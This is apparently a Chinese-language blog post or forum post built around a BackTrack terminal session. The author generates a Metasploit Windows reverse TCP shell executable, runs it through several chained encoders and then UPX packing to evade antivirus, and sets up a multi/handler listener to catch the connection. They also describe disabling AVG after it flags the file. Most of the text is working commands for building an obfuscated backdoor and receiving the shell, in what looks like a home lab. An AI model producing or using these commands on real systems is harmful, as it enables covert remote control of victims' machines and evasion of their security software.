root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload3.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 967 (iteration=1)
[*] x86/alpha_upper succeeded with size 2002 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2031 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2060 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2089 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2118 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2147 (iteration=5)
[*] x86/countdown succeeded with size 2165 (iteration=1)
[*] x86/countdown succeeded with size 2183 (iteration=2)
[*] x86/countdown succeeded with size 2201 (iteration=3)
[*] x86/countdown succeeded with size 2219 (iteration=4)
[*] x86/countdown succeeded with size 2237 (iteration=5)
real 17m56.774s
user 1m22.481s
sys 6m38.633s
root@bt:~# ls
Desktop payload3.exe
上面的命令,产生了payload3.exe。
下面是upx:
root@bt:~# apt-get install upx
Reading package lists... Done
Building dependency tree
Reading state information... Done
Note, selecting upx-ucl instead of upx
upx-ucl is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@bt:~# upx --help
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2009
UPX 3.04 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 27th 2009
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
--best compress best (can be slow for big files)
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give this help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
--no-color, --mono, --color, --no-progress change look
Compression tuning options:
--brute try all available compression methods & filters [slow]
--ultra-brute try even more compression variants [very slow]
Backup options:
-k, --backup keep backup files
--no-backup no backup files [default]
Overlay options:
--overlay=copy copy any extra data attached to the file [default]
--overlay=strip strip any extra data attached to the file [DANGEROUS]
--overlay=skip don't compress a file with an overlay
Options for djgpp2/coff:
--coff produce COFF output [default: EXE]
Options for dos/com:
--8086 make compressed com work on any 8086
Options for dos/exe:
--8086 make compressed exe work on any 8086
--no-reloc put no relocations in to the exe header
Options for dos/sys:
--8086 make compressed sys work on any 8086
Options for ps1/exe:
--8-bit uses 8 bit size compression [default: 32 bit]
--8mib-ram 8 megabyte memory limit [default: 2 MiB]
--boot-only disables client/host transfer compatibility
--no-align don't align to 2048 bytes [enables: --console-run]
Options for watcom/le:
--le produce LE output [default: EXE]
Options for win32/pe, rtm32/pe & arm/pe:
--compress-exports=0 do not compress the export section
--compress-exports=1 compress the export section [default]
--compress-icons=0 do not compress any icons
--compress-icons=1 compress all but the first icon
--compress-icons=2 compress all but the first icon directory [default]
--compress-icons=3 compress all icons
--compress-resources=0 do not compress any resources at all
--keep-resource=list do not compress resources specified by list
--strip-relocs=0 do not strip relocations
--strip-relocs=1 strip relocations [default]
file.. executables to (de)compress
This version supports:
AMD64-darwin.macho Mach/AMD64
ARMEL-darwin.macho Mach/ARMEL
amd64-linux.elf linux/ElfAMD
amd64-linux.kernel.vmlinux vmlinux/AMD64
arm-linux.elf linux/armel
arm-linux.kernel.vmlinux vmlinux/armel
arm-wince.pe arm/pe
armeb-linux.elf linux/armeb
armeb-linux.kernel.vmlinux vmlinux/armeb
armel-linux.kernel.vmlinuz vmlinuz/armel
fat-darwin.macho Mach/fat
i086-dos16.com dos/com
i086-dos16.exe dos/exe
i086-dos16.sys dos/sys
i386-bsd.elf.execve BSD/386
i386-darwin.dylib Dylib/i386
i386-darwin.macho Mach/i386
i386-dos32.djgpp2.coff djgpp2/coff
i386-dos32.tmt.adam tmt/adam
i386-dos32.watcom.le watcom/le
i386-freebsd.elf BSD/elf386
i386-linux.elf linux/elf386
i386-linux.elf.execve linux/386
i386-linux.elf.shell linux/sh386
i386-linux.kernel.bvmlinuz bvmlinuz/386
i386-linux.kernel.vmlinux vmlinux/386
i386-linux.kernel.vmlinuz vmlinuz/386
i386-netbsd.elf BSD/elf386
i386-openbsd.elf BSD/elf386
i386-win32.pe win32/pe
m68k-atari.tos atari/tos
mips-linux.elf linux/mipseb
mipsel-linux.elf linux/mipsel
mipsel.r3000-ps1 ps1/exe
powerpc-darwin.dylib Dylib/ppc32
powerpc-darwin.macho Mach/ppc32
powerpc-linux.elf linux/ElfPPC
powerpc-linux.kernel.vmlinux vmlinux/ppc32
UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@bt:~#
现在进行加壳:
root@bt:~# upx -5 payload3.exe -k
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2009
UPX 3.04 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 27th 2009
File size Ratio Format Name
-------------------- ------ ----------- -----------
73802 -> 48128 65.21% win32/pe payload3.exe
Packed 1 file.
root@bt:~# ls -l
total 276
drwxr-xr-x 2 root root 48 2011-05-07 13:46 Desktop
-rw-r--r-- 1 root root 73802 2013-04-28 04:21 payload3_before.exe
-rw-r--r-- 1 root root 73802 2013-04-28 04:53 payload3.ex~
-rw-r--r-- 1 root root 48128 2013-04-28 04:53 payload3.exe
-rw-r--r-- 1 root root 73802 2013-04-28 04:28 read.exe
root@bt:~#
加壳后,payload3.exe,文件变小了,备份文件是payload3.ex~
把payload3.exe上传到XP,我发现avg报告威胁。关闭掉杀毒软件后,我双击exe,发现加壳后,不能连接到BT,因为:
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337
[*] Starting the payload handler...
一直处于这样的状态,但是不用upx做加壳,双击exe,是可以连接BT5的。不知道为什么。
为了验证加壳有没有失败,我用一个正常的putty.exe来测试,测试结果是:对putty.exe,是没有问题的。
上面可能是因为加壳失败,或者是解压缩要花很多时间,或者其他的原因。